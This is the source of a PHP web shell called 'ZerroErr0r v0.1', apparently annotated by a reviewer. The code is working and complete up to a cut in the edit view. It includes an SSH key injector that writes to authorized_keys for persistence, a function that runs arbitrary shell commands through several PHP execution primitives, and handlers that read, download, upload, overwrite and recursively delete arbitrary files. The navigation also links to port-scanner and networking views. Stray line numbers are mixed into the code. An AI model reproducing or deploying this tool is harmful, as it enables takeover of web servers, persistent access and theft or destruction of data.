<?php
// Request entry point of a single-file PHP web shell ("ZerroErr0r v0.1" per the
// HTML <title> further down). Every handler below runs on each request, before
// any HTML is emitted.
session_start();
// All PHP errors and warnings are silenced, so failures in the handlers below
// (bad paths, unwritable files, unset session keys) leave no trace in the response.
error_reporting(0);

$password = "bf211b896d1233e0b9fc5acb604b0329"; // md5 hashed


// Login handler. The submitted password is hashed with unsalted MD5 and compared
// to the hard-coded digest using loose `==`; since the stored digest is not a
// numeric string this behaves as a plain string comparison here. On success the
// plaintext password itself is kept in the session and later used as the
// "logged in" marker (the isset($_SESSION['password']) check in the HTML part).
// Both outcomes redirect to "?", so the response does not reveal which one occurred.
if (isset($_POST['password'])) {
    if (md5($_POST['password']) == $password) {
        $_SESSION['password'] = $_POST['password'];
        header("Location: ?");
    } else {
        header("Location: ?");
    }
}
16
// ssh key injector
// Persistence handler: appends the POSTed public key (`pub_key`, unvalidated) to
// <DOCUMENT_ROOT>/../.ssh/authorized_keys, i.e. the .ssh directory one level
// above the web root. Which account that corresponds to depends on the host
// layout (presumably the web server user's home; verify on the affected host).
// NOTE(review): a defender looking for this activity should watch for
// authorized_keys being modified by the web server process.
if (isset($_POST['inject_key'])) {
    $key = $_POST['pub_key'];

    // TODO: make this method works on windows servers
    // this is only for linux server
    chdir($_SERVER['DOCUMENT_ROOT'] . "/..");
    // An existing .ssh directory must be writable; otherwise one is created in
    // the parent directory (with default permissions — no mode is passed to mkdir).
    if (file_exists(getcwd() . "/.ssh")) {
        if (!is_writable((getcwd() . '/.ssh'))) {
            header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied"));
            die();
        }
    } else {
        if (!is_writable(getcwd())) {
            header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied"));
            die();
        }
        mkdir(getcwd() . "/.ssh");
    }

    // "a+" appends, so existing authorized_keys entries are preserved. The key is
    // written verbatim (no trailing newline is added) and the fopen/fwrite results
    // are not checked; failures are silent because of error_reporting(0) above.
    $key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+");
    fwrite($key_file, $key);
    fclose($key_file);
    // Restore the explorer's working directory. $_SESSION['cd'] is not checked with
    // isset here, so on a fresh session this chdir() fails silently.
    chdir($_SESSION['cd']);
    // No die() after the success redirect: the rest of the page still renders.
    header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh key injected successfully!"));
}
43
/**
 * Streams a server file to the client as an attachment.
 *
 * The caller passes the raw `view` query parameter (see the `action == 'download'`
 * dispatch below). $path is the empty string, so $filename is used as given —
 * absolute, or relative to the current working directory — with no restriction
 * to any base directory.
 *
 * @param string $filename  Path of the file to send; an empty value is a no-op.
 * @return void  Calls exit after sending the file; redirects with a message
 *               when the file does not exist (and then returns, so the page
 *               continues to render).
 */
function download($filename){
    if(!empty($filename)){
        // Specify file path.
        $path = ''; // '/uplods/'
        $download_file = $path.$filename;
        // Check file is exists on given path.
        if(file_exists($download_file)) {
            // Getting file extension.
            // The extension is simply the text after the last '.', taken from the
            // caller-supplied name; it is reused unescaped in the Content-Type header.
            $extension = explode('.',$filename);
            $extension = $extension[count($extension)-1];
            // For Gecko browsers
            header('Content-Transfer-Encoding: binary');
            // NOTE: filemtime() is called on $path (''), not on $download_file, so it
            // returns false and gmdate() formats timestamp 0 (the Unix epoch) instead
            // of the real modification time; the warning is silenced.
            header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . ' GMT');
            // Supports for download resume
            // (Accept-Ranges is advertised, but Range requests are not honoured —
            // readfile() below always sends the whole file.)
            header('Accept-Ranges: bytes');
            // Calculate File size
            header('Content-Length: ' . filesize($download_file));
            header('Content-Encoding: none');
            // Change the mime type if the file is not PDF
            header('Content-Type: application/'.$extension);
            // Make the browser display the Save As dialog
            // The filename value is not quoted, so names with spaces or ';' produce
            // a malformed Content-Disposition header.
            header('Content-Disposition: attachment; filename=' . $filename);
            readfile($download_file);
            exit;
        }
        else {
            header("Location: ?msg=" . base64_encode('File does not exists on given path'));
        }

    }
}
75
// Download dispatch: `?view=<path>&action=download` hands the raw path to download().
if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'download') {
    download($_GET['view']);
}

// Logout: destroys the server-side session (dropping the 'password' login marker
// and the 'cd' working directory) and stops rendering.
if (isset($_GET['action']) AND $_GET['action'] == 'logout') {
    session_destroy();
    header("Location: ?");
    die();
}
85
86
/**
 * Recursively deletes a directory tree, then the directory itself.
 *
 * The `if (is_dir($dirname))` has no braces, so only the opendir() call is
 * conditional: for a non-directory $dirname, $dir_handle is never assigned and
 * the `!$dir_handle` test (undefined variable, warning silenced) returns false —
 * the intended result, reached by accident.
 *
 * The `while ($file = readdir(...))` condition is truthiness-based, so an entry
 * literally named "0" ends the scan early and later entries survive. is_dir()
 * follows symlinks, so a symlink to a directory is recursed into and its
 * target's contents are deleted.
 *
 * @param string $dirname  Directory to remove.
 * @return bool  false if no handle could be opened, true otherwise
 *               (unlink()/rmdir() results are not checked).
 */
function delete_directory($dirname) {
    if (is_dir($dirname))
        $dir_handle = opendir($dirname);
    if (!$dir_handle)
        return false;
    while($file = readdir($dir_handle)) {
        if ($file != "." && $file != "..") {
            if (!is_dir($dirname."/".$file))
                unlink($dirname."/".$file);
            else
                delete_directory($dirname.'/'.$file);
        }
    }
    closedir($dir_handle);
    rmdir($dirname);
    return true;
}
104
// Explorer state: the working directory is carried in the session, taken from the
// base64 `cd` query parameter. It is neither canonicalised nor restricted.
if (isset($_GET['cd'])) {
    $_SESSION['cd'] = base64_decode($_GET['cd']);
}

// Recursive directory delete (`rmdir`) and single-file delete (`rmfile`), both
// keyed by a base64-encoded path. realpath() only resolves the path; there is no
// check that it lies under any base directory. A non-existent path does nothing
// and sets no message. None of the redirects below is followed by exit, so the
// page keeps rendering after the Location header.
if (isset($_GET['rmdir'])) {
    $file = realpath(base64_decode($_GET['rmdir']));
    if (file_exists($file)) {
        if (is_writable($file)) {
            delete_directory($file);
            header("Location: ?msg=" . base64_encode($file . " has been deleted!"));
        } else {
            header("Location: ?msg=" . base64_encode("permission denied!"));
        }
    }
}
if (isset($_GET['rmfile'])) {
    $file = realpath(base64_decode($_GET['rmfile']));
    if (file_exists($file)) {
        if (is_writable($file)) {
            unlink($file);
            header("Location: ?msg=" . base64_encode($file . " has been deleted!"));
        } else {
            header("Location: ?msg=" . base64_encode("permission denied!"));
        }
    }
}

// Bulk delete: `multirmfile=N` with `rmfile0` .. `rmfile(N-1)`. Directories are
// removed with plain rmdir() here (non-recursive, unlike the `rmdir` handler
// above), so non-empty directories are left in place. The Location header is
// re-sent on every iteration; the last one wins.
if (isset($_GET['multirmfile'])) {
    for ($i = 0; $i < intval($_GET['multirmfile']); $i++) {
        $file = realpath(base64_decode($_GET['rmfile' . $i]));
        if (file_exists($file)) {
            if (is_writable($file)) {
                if (is_dir($file)) {
                    rmdir($file);
                } else {
                    unlink($file);
                }
                header("Location: ?msg=" . base64_encode("selected file(s) has been deleted!"));
            } else {
                header("Location: ?msg=" . base64_encode("permission denied!"));
            }
        }
    }
}

// Apply the session working directory to this request. Only isset is checked, so
// a stale or inaccessible path makes chdir() fail silently and the process cwd
// stays wherever it was.
if (isset($_SESSION['cd'])) {
    chdir($_SESSION['cd']);
}

// Rename/move: `from` is a base64 path, `to` is a plain name joined onto the
// current working directory. `to` is not sanitised, so it can contain path
// separators and move the file elsewhere. is_writable() is tested before
// file_exists(), which makes the inner "file doesn't exist" branch unreachable
// (is_writable() is false for a missing path).
if (isset($_GET['to']) AND isset($_GET['from'])) {
    $from = base64_decode($_GET['from']);
    $to = $_GET['to'];

    if (is_writable($from)) {
        if (file_exists($from)) {
            rename($from, getcwd() . '/' . $to);
            header('Location: ?msg=' . base64_encode("file renamed successfully!"));
        } else {
            header("Location: ?msg=" . base64_encode("file doesn't exist"));
        }
    } else {
        header("Location: ?msg=" . base64_encode("permission denied!"));
    }
}
169
/**
 * Renders a byte count as a human-readable size ("1.50 KB", "12 B", "0 B").
 *
 * Thresholds are binary (1024-based). GB/MB/KB values get two decimals via
 * number_format() (default separators), values from 1 up to 1023 are printed
 * as-is with a " B" suffix, and anything below 1 (zero or negative) collapses
 * to "0 B".
 *
 * @param int|float $bytes
 * @return string
 */
function formatSizeUnits($bytes) {
    // Largest unit first; the first threshold the value reaches wins.
    $units = array(
        1073741824 => 'GB',
        1048576    => 'MB',
        1024       => 'KB',
    );
    foreach ($units as $factor => $label) {
        if ($bytes >= $factor) {
            return number_format($bytes / $factor, 2) . ' ' . $label;
        }
    }
    if ($bytes >= 1) {
        return $bytes . ' B';
    }
    return '0 B';
}
/**
 * Formats a fileperms() mode word in `ls -l` style, e.g. "drwxr-xr-x".
 *
 * The first character is the file type taken from the high nibble: socket 's',
 * symlink 'l', regular file 'r' (note: 'r' rather than the usual '-'), block
 * device 'b', directory 'd', character device 'c', FIFO 'p', anything else 'u'.
 * The remaining nine characters are the owner/group/world rwx triads; the
 * execute slot becomes s/S (setuid, setgid) or t/T (sticky) when the matching
 * special bit is set, lower-case if execute is also set, upper-case if not.
 *
 * @param int $perms  Mode as returned by fileperms().
 * @return string  Ten-character permission string.
 */
function formatPerms($perms) {
    $typeChars = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => 'r', // regular
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $typeBits = $perms & 0xF000;
    $info = isset($typeChars[$typeBits]) ? $typeChars[$typeBits] : 'u'; // 'u' = unknown

    // Builds one rwx triad. $special is the setuid/setgid/sticky bit that belongs
    // to this triad; $withExec/$noExec are the letters shown in the execute slot
    // when that special bit is set and execute is / is not set.
    $triad = function ($readBit, $writeBit, $execBit, $special, $withExec, $noExec) use ($perms) {
        $chars = ($perms & $readBit) ? 'r' : '-';
        $chars .= ($perms & $writeBit) ? 'w' : '-';
        if ($perms & $execBit) {
            $chars .= ($perms & $special) ? $withExec : 'x';
        } else {
            $chars .= ($perms & $special) ? $noExec : '-';
        }
        return $chars;
    };

    $info .= $triad(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'); // Owner
    $info .= $triad(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'); // Group
    $info .= $triad(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'); // World

    return $info;
}
/**
 * Formats a file's last-modification time as "M-d-Y H:i:s" in PHP's default
 * timezone.
 *
 * @param string $filename
 * @return string|null  Formatted timestamp, or null (implicit return) when the
 *                      file does not exist.
 */
function modifiedDate($filename) {
    if (!file_exists($filename)) {
        return;
    }
    $mtime = filemtime($filename);
    return date("M-d-Y H:i:s", $mtime);
}
235
/**
 * Runs a shell command line and returns its captured output as a string.
 *
 * The execution primitives are tried in order — exec, passthru, system,
 * shell_exec, popen — and the first one that is still available is used
 * (function_exists() is false for names listed in disable_functions; popen is
 * not probed, just attempted). Every call is `@`-suppressed, so a failure yields
 * an empty (or, for shell_exec, null) result rather than an error. Redirection of
 * stderr is not done here; callers append " 2>&1" themselves (see the terminal view).
 *
 * @param string $in  Command line passed to the shell without any quoting.
 * @return string|null  Captured stdout — newline-joined for exec, buffered via
 *                      ob_start() for passthru/system, read in 1024-byte chunks
 *                      for popen — or '' when nothing could be executed.
 */
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
259
/**
 * Locates a program on PATH by shelling out to `which` through ex().
 *
 * $p is concatenated into the command line without escaping.
 *
 * @param string $p  Program name.
 * @return string|false  Raw `which` output (trailing newline included), or
 *                       false when the output is empty.
 */
function which($p) {
    $path = ex('which '.$p);
    if(!empty($path))
        return $path;
    return false;
}
266
// Editor save: `dest` and `content` both come from the POST body. Any path the
// PHP process can write is overwritten (mode 'w' truncates); fopen/fwrite results
// are not checked. As with the other handlers in this file, header() is not
// followed by exit, so the page continues to render into the redirect response.
if (isset($_POST['edit'])) {
    if (is_writable($_POST['dest'])) {
        $file = fopen($_POST['dest'], 'w');
        fwrite($file, $_POST['content']);
        fclose($file);
        header('Location: ?msg=' . base64_encode("file saved!"));
    } else {
        header('Location: ?msg=' . base64_encode("permission denied!"));
    }
}

// Create an empty file: `touch` is a base64 directory, `file` a plain name joined
// with '/'. The writability check is on dirname() of that directory — its parent —
// not on the directory the file is actually created in.
if (isset($_GET['touch']) AND isset($_GET['file'])) {
    if (is_writable(dirname(base64_decode($_GET['touch'])))) {
        $content = "";
        $fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],"wb");
        fwrite($fp,$content);
        fclose($fp);
        header("Location: ?msg=" . base64_encode($_GET['file'] . " has been created!"));
    } else {
        header("Location: ?msg=" . base64_encode("permission denied!"));
    }
}

// Create a directory; same parent-directory check as the `touch` handler above.
if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) {
    if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) {
        mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']);
        header("Location: ?msg=" . base64_encode($_GET['folder'] . " folder has been created!"));
    } else {
        header("Location: ?msg=" . base64_encode("permission denied!"));
    }
}

// Upload handler: the destination directory is `path` from the POST body and the
// file name is the client-supplied upload name, used unmodified. The duplicate
// check is commented out, so an existing file at $fullpath is replaced.
if (isset($_POST['upload'])) {
    if (is_writable($_POST['path'])) {
        $files = @$_FILES["files"];
        $fullpath = $_POST['path'] . "/" . $files["name"];

        // if (file_exists($fullpath)) {
        // header("Location: ?msg=" . base64_encode("file already exist!"));
        // die();
        // }

        if ($files["name"] != '') {
            if (move_uploaded_file($files['tmp_name'], $fullpath)) {
                header("Location: ?msg=" . base64_encode("file uploaded to $fullpath"));
            } else {
                header("Location: ?msg=" . base64_encode("an error occured!"));
            }
        }
    } else {
        // base64_decode() is applied to a plain-text literal here, so the message
        // that reaches the page is binary garbage rather than "permission denied!".
        header("Location: ?msg=" . base64_encode(base64_decode('permission denied!')));
    }
}

// Path bar submit: bounce through the `cd` query handler so the directory is
// stored in the session.
if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) {
    header("Location: ?cd=" . base64_encode($_POST['qpath']));
}



// Zip handler: creates "<basename of cwd>.zip" inside the current directory and
// adds the selected non-directory entries. Each `fileN` value is reduced to its
// basename and resolved against the cwd, so the directory part of the value is
// ignored. Despite the success message, nothing is sent to the client here; the
// archive is only written to disk.
if (isset($_GET['action']) AND isset($_GET['numfiles']) AND $_GET['action'] == 'zip') {
    $zip = new ZipArchive();
    chdir($_SESSION['cd']);
    // Split the cwd on the platform separator to get its last component.
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        $tmp = explode('\\', getcwd());
    } else {
        $tmp = explode('/', getcwd());
    }

    if($zip->open(getcwd() . "/" . $tmp[count($tmp) - 1] . ".zip", ZipArchive::CREATE) === TRUE) {
        for ($i = 0; $i < intval($_GET['numfiles']); $i++) {
            // $zip->addFromString(basename(getcwd() . '/cx.txt'), file_get_contents(getcwd() . '/cx.txt'));
            $file = base64_decode($_GET['file' . $i]);
            if (!is_dir($file)) {
                $zip->addFile(basename($file));
            }
        }
        $zip->close();

        header("Location: ?msg=" . base64_encode("selected files has been compressed and downloaded."));
    } else {
        // echo before header(): once output has started the Location header can no
        // longer be sent (warning silenced) unless output buffering is active.
        echo "Failed!";
        header("Location: ?msg=" . base64_encode("failed to create a zip file"));
    }
}
352
353?>
354
355<!DOCTYPE html>
356<html>
357<head>
358 <meta charset="utf-8">
359 <title>- ZerroErr0r v0.1</title>
360 <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
361 <style type="text/css">
362 .hljs{display:block;overflow-x:auto;padding:.5em;background:#071414;color:#e6e1dc}.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}.hljs-keyword,.hljs-selector-tag{color:#c26230}.hljs-number,.hljs-regexp,.hljs-string,.hljs-template-variable,.hljs-variable{color:#a5c261}.hljs-subst{color:#519f50}.hljs-name,.hljs-tag{color:#e8bf6a}.hljs-type{color:#da4939}.hljs-attr,.hljs-built_in,.hljs-builtin-name,.hljs-bullet,.hljs-link,.hljs-symbol{color:#6d9cbe}.hljs-params{color:#d0d0ff}.hljs-attribute{color:#cda869}.hljs-meta{color:#9b859d}.hljs-section,.hljs-title{color:#ffc66d}.hljs-addition,.hljs-deletion{color:#e6e1dc;display:inline-block;width:100%}.hljs-addition{background-color:#144212}.hljs-deletion{background-color:#600}.hljs-selector-class{color:#9b703f}.hljs-selector-id{color:#8b98ab}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}.hljs-link{text-decoration:underline}
363 </style>
364
365 <script type="text/javascript">
366 window.addEventListener('load', function() {
367 var boxes = document.getElementsByClassName('box');
368 for (var i = 0; i < boxes.length; i++) {
369 boxes[i].innerHTML += "<span class='c1'></span><span class='c2'></span><span class='c3'></span><span class='c4'></span>";
370 }
371 }, false);
372 </script>
373
374 <style type="text/css">
375 @import url(https://fonts.googleapis.com/css?family=Electrolize);body,h1,h2,h3,h4,h5,nav ul{margin:0;padding:0}nav li a,nav li a:hover{transition:all .2s ease}nav li a,section a{text-decoration:none}nav li,nav li a{display:inline-block}.logo span,body,form textarea,section a:hover{color:#AAA}.error,footer{text-align:right}body{background-color:#071414;font-family:Electrolize,monospace,sans-serif,arial}header{padding:20px;border:1px solid #BBB;margin:20px}header .logo{float:left;position:relative;top:3px}header .info{float:right;text-transform:uppercase}.logo span{opacity:.7}nav{padding:0 20px;}nav li a{padding:4px 15px;color:#E3052B;}nav li a:hover{text-decoration: line-through;}section{margin:20px;border:1px solid #E3052B;}section .content{padding:20px}section .title{background-color:#0E1A1F;padding:10px 20px;border-bottom:1px solid #85001A}section table{width:100%}section table td{padding:5px 15px}section table .td_head td{padding:0 15px 20px;text-transform:uppercase}section table tr:hover{background-color:#1A272E}section table tr:first-child:hover{background-color:transparent}section a{color:#EF330E}.error{padding:10px 20px;background-color:#E3052B; text-align:center;color:#EEE;}img{max-width:100%}pre{overflow:auto}pre code{font-size:1rem}form textarea{width:100%;display:block;border:none;height:500px;background-color:transparent;resize:none;font-size:1.2rem;outline:0}form input[type=submit],form select{padding:5px 20px;font-family: 'Electrolize', monospace;border:1px solid #E3052B;display:inline-block;margin-top:20px;font-size:1rem;background-color:transparent;color:#E3052B;cursor:pointer;outline:none;}form select{background-color:#071414;outline:0}form input[type=submit]:hover{background-color:#85001A;color:#AAA}form 
input[type=text]{border:none;background-color:transparent;font-size:1.1rem;width:80%;outline:0;color:#EF330E;font-family:monospace}.light_red{color:#E3052B}.dark_red{color:#85001A}.orange{color:#EF330E}.light_black{color:#0E1A1F}.dark_black{color:#071414}.clearfix:after{content:'';display:table;clear:both}::-webkit-scrollbar{width:8px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px}::-webkit-scrollbar-thumb{background-color:#85001a}footer{padding:20px;opacity:.2}.result{margin-top:20px;padding:10px;background-color:#1A272E}#login input{background-color:transparent;border:1px solid #E3052B;width:100%;box-sizing:border-box;padding:10px 20px;display:block;margin-top:5px;color:#E3052B;outline:0}#login{width:300px;}#login input[type=submit]{margin-top:15px}#login input[type=submit]:hover{background-color:#85001A;color:#AAA}form .title{border: none;width: 100%;color:#AAA;font-size: 1.1rem;font-family: 'Electrolize', monospace; box-sizing: border-box;border-bottom: 1px solid #E3052B; outline: none;}.box { border: 2px solid #85001A; }.box .c1, .box .c2, .box .c3, .box .c4 { display: block; position: absolute; width: 5px; height: 3px; background-color: #EEE; }.box .c1 { top: -2px; left: -2px; }.box .c2 { top: -2px; right: -2px; }.box .c3 { bottom: -2px; right: -2px; }.box .c4 { bottom: -2px; left: -2px; }header { position: relative; }header .logo p, header .logo{font-weight: lighter;padding: 0;margin: 0;top:0;}section{position: relative;}#login p{margin: 0;}#login{position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%);}#login .content{padding: 20px;}#login .title{padding: 10px 20px;border-color: #85001A;border-width: 2px;}#login .content input {border-color: #85001A;}select {font-family: 'Electrolize', monospace;padding: 0 20px;}pre {white-space: pre-wrap;white-space: -moz-pre-wrap;white-space: -pre-wrap;white-space: -o-pre-wrap;word-wrap: break-word;}.view_action, .action_menu{padding: 10px 
20px;border-bottom:2px solid #85001A;position: relative;}.view_action button, .action_menu button{outline:none;border: 1px solid #E3052B;background-color: transparent;color: #E3052B;padding: 5px 15px;display: inline-block;cursor: pointer;font-family: 'Electrolize', monospace;}.view_action button:hover, .action_menu button:hover{background-color: #85001A;color: #EEE;}.file_select{opacity: 0;}tr:hover .file_select{opacity: 1;}.file_select{margin: 0;padding: 0;cursor: pointer;outline: none;}.action_menu{display: none;}.info_head{padding: 10px 20px;background-color: #85001A;cursor: pointer;margin: 5px 0 0 0;}.server_info table { border:1px solid #85001A;}.server_info table td { border: 0.1px solid #333; }.server_info table tr:hover {background-color: transparent;}.off{display: none;}.port_scanner input[type='text']{display: inline-block; padding: 10px;border:1px solid #E3052B;width: 100%;box-sizing: border-box;}.port_scanner tr:hover{background-color: transparent;}.port_scanner td {padding: 3px 0;}
376 </style>
377
378 <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.10.0/highlight.min.js"></script>
379</head>
380<body>
381<?php if (!isset($_SESSION['password'])) { ?>
382
383<form action="" method="post" id="login" class="box">
384 <p class="title">PASSWORD</p><br>
385 <div class="content">
386 <input type="text" name="password" style="-webkit-text-security: square;font-size: 1.3rem; text-align: center;padding: 5px;-webkit-text-security: square;letter-spacing: 3px;padding-bottom: 8px;font-family: 'Electrolize', monospace;" autocomplete="off" spellcheck="false" autofocus>
387 <input type="submit" name="login" value="GET IN!" style="font-family: 'Electrolize', monospace;font-size: 1rem;">
388 </div>
389</form>
390
391<?php die(); } ?>
392
393
394<header class="clearfix box">
395 <div class="logo">
396 <p>ZeroErr0r <span>v0.1</span></p>
397 </div>
398 <div class="info">
399 Server IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']) ?>
400 </div>
401</header>
402<nav>
403 <ul>
404 <li><a href="?">explorer</a></li>
405 <li><a href="?view=evaluate">evaluate</a></li>
406 <li><a href="?view=info">info</a></li>
407 <li><a href="?view=terminal">terminal</a></li>
408 <li><a href="?view=port_scanner">port scanner</a></li>
409 <li><a href="?view=injector">injector</a></li>
410 <li><a href="?view=database">database</a></li>
411 <li><a href="?view=networking">networking</a></li>
412 <li><a href="?action=logout"><i class="fa fa-sign-out"></i> logout</a></li>
413 </ul>
414</nav>
415<section class="box">
416 <?php if (isset($_GET['msg'])) { ?>
417 <div class="error"><?php echo base64_decode($_GET['msg']) ?></div>
418 <?php } ?>
419
420 <script>
421 function showAction() {
422 var s = document.getElementsByClassName('file_select');
423 var m = document.getElementsByClassName('action_menu')[0];
424 for (var i = 0; i < s.length; i++) {
425 if (s[i].checked) {
426 m.style.display = 'block';
427 break;
428 } else {
429 m.style.display = 'none';
430 }
431 }
432 }
433 </script>
434
435 <div class="action_menu">
436 <button onclick="filesDelete()"><i class="fa fa-trash"></i> Delete</button>
437 <button onclick="filesCompress()"><i class="fa fa-download"></i> Compress</button>
438 </div>
439
440 <!-- SUB_MENU -->
441 <?php if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?>
442 <div class="view_action">
443 <a href="?view=<?php echo $_GET['view'] ?>&action=edit"><button><i class="fa fa-pencil"></i> Edit</button></a>
444 <a href="?view=<?php echo $_GET['view'] ?>&action=download"><button><i class="fa fa-download"></i> Download</button></a>
445 <a href="?rmfile=<?php echo base64_encode($_GET['view']) ?>"><button><i class="fa fa-trash"></i> Delete</button></a>
446 <a href="?"><button><i class="fa fa-close"></i> Close</button></a>
447 </div>
448 <?php } ?>
449 <?php if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?>
450 <div class="view_action">
451 <a href="?view=<?php echo $_GET['view'] ?>"><button><i class="fa fa-asterisk"></i> Basic Injector</button></a>
452 <a href="?view=<?php echo $_GET['view'] ?>&action=ssh"><button><i class="fa fa-exchange"></i> SSH Injector</button></a>
453 </div>
454 <?php } ?>
455
456 <form action="" method="POST">
457 <input class="title" value="<?php echo getcwd(); ?>" name="qpath" spellcheck="false" autocomplete="off" style="border-color: #85001A;border-width: 2px;">
458 </form>
459 <div class="content">
460 <?php if (!isset($_GET['view'])) { ?>
461 <table>
462 <tr class="td_head">
463 <td>name</td>
464 <td>size</td>
465 <td>permissions</td>
466 <td>modified</td>
467 <td>action</td>
468 </tr>
469 <?php
470 // echo getcwd() . "<br>";
471 // chdir("..");
472 // echo getcwd();
473 $directories = array();
474 $files_list = array();
475 if ($handle = opendir('.')) {
476
477 while (false !== ($entry = readdir($handle))) {
478
479 if (is_dir($entry)) {
480 $directories[] = $entry;
481 } else {
482 $files_list[] = $entry;
483 }
484 }
485
486 closedir($handle);
487 }
488 asort($directories);
489
490 foreach ($directories as $dir) {
491 if ($dir != "." && $dir != "..") {
492 $size = "Dir";
493 $perms = formatPerms(fileperms($dir));
494 $modified = modifiedDate($dir);
495 $link = "?cd=" . base64_encode(getcwd() . "/" . $dir);
496 $del = "?rmdir=" . base64_encode(getcwd() . "/" . $dir);
497 $down_path = getcwd() . "/" . $dir;
498 $path = base64_encode($down_path);
499 // $upload_path = realpath(dirname(__FILE__) . $dir);
500
501 echo "<tr>";
502 echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$path'> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>";
503 echo "<td>$size</td>";
504 echo "<td>$perms</td>";
505 echo "<td>$modified</td>";
506 echo "<td class='action'><a href='#' onclick='rename(\"$path\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$down_path&action=upload'>upl</a></td>";
507 echo "</tr>";
508 } else {
509 $size = "Link";
510 $perms = formatPerms(fileperms($dir));
511 $modified = modifiedDate($dir);
512 $down_path = getcwd() . "/" . $dir;
513 if ($dir == '..'){
514 $link = "?cd=" . base64_encode(getcwd() . "/..");
515 $touch_path = base64_encode('..');
516 $mkdir_path = base64_encode('..');
517 $upload_dir = '..';
518 } else {
519 $link = "?cd=" . base64_encode(getcwd());
520 $touch_path = base64_encode($down_path);
521 $mkdir_path = base64_encode($down_path);
522 $upload_dir = getcwd();
523 }
524
525 echo "<tr>";
526 echo "<td><input type='checkbox' style='opacity:0;margin: 0;padding: 0;' disabled> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>";
527 echo "<td>$size</td>";
528 echo "<td>$perms</td>";
529 echo "<td>$modified</td>";
530 echo "<td class='action'><a href='?view=$upload_dir&action=upload'>upl</a> - <a href='#' onclick='touch(\"$touch_path\")'>+file</a> - <a href='#' onclick='mkdir(\"$mkdir_path\")'>+dir</a></td>";
531 echo "</tr>";
532 }
533 }
534
535 foreach ($files_list as $file) {
536 // if ($file != "." && $file != "..") {
537 $size = formatSizeUnits(filesize($file));
538 $perms = formatPerms(fileperms($file));
539 $modified = modifiedDate($file);
540 $del = "?rmfile=" . base64_encode(getcwd() . "/" . $file);
541 // $down_path = realpath(getcwd() . "/" . $file);
542 $path = getcwd() . "/" . $file;
543 $rename_path = base64_encode($down_path);
544 $isimg = @is_array(getimagesize($file));
545
546 // echo "<p>$file <b>" . formatSizeUnits(filesize($file)) . "</b></p>";
547 echo "<tr>";
548 echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$rename_path'> <a href='?view=$path&action=display&img=$isimg'><i class='fa fa-file-text'></i> $file</a></td>";
549 echo "<td>$size</td>";
550 echo "<td>$perms</td>";
551 echo "<td>$modified</td>";
552 echo "<td class='action'><a href='?view=$path&action=edit'>edit</a> - <a href='#' onclick='rename(\"$rename_path\", \"$file\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$path&action=download'>dl</a></td>";
553 echo "</tr>";
554 // }
555 }
556
557 ?>
558 </table>
559 <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?>
560 <?php $path_info = pathinfo($_GET['view']); ?>
561
562 <pre><code class="<?php echo $path_info['extension'] ?>"><?php
563 if (file_exists($_GET['view'])) {
564 if ($_GET['img'] === '1') {
565 $image = (strpos($_GET['view'], $_SERVER['DOCUMENT_ROOT']) !== false) ? preg_replace('#'. $_SERVER['DOCUMENT_ROOT'] .'#', 'http://' . $_SERVER['HTTP_HOST'], $_GET['view']) : $_GET['view'];
566 // Read image path, convert to base64 encoding
567 $imageData = base64_encode(file_get_contents($image));
568
569 // Format the image SRC: data:{mime};base64,{data};
570 $src = 'data: '. pathinfo($image, PATHINFO_EXTENSION) .';base64,'.$imageData;
571
572 // Echo out a sample image
573 echo '<img src="' . $src . '">';
574 } else {
575 $file = fopen($_GET['view'], 'r');
576 if (filesize($_GET['view']) > 0)
577 echo htmlspecialchars(fread($file, filesize($_GET['view'])));
578 else
579 echo "Empty";
580 fclose($file);
581 }
582 }
583 ?></code></pre>
584
585 <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'edit') { ?>
586
587 <?php
588 $file = fopen($_GET['view'], 'r');
589 if (filesize($_GET['view']) > 0)
590 $content = htmlspecialchars(fread($file, filesize($_GET['view'])));
591 else
592 $content = "";
593 fclose($file);
594 ?>
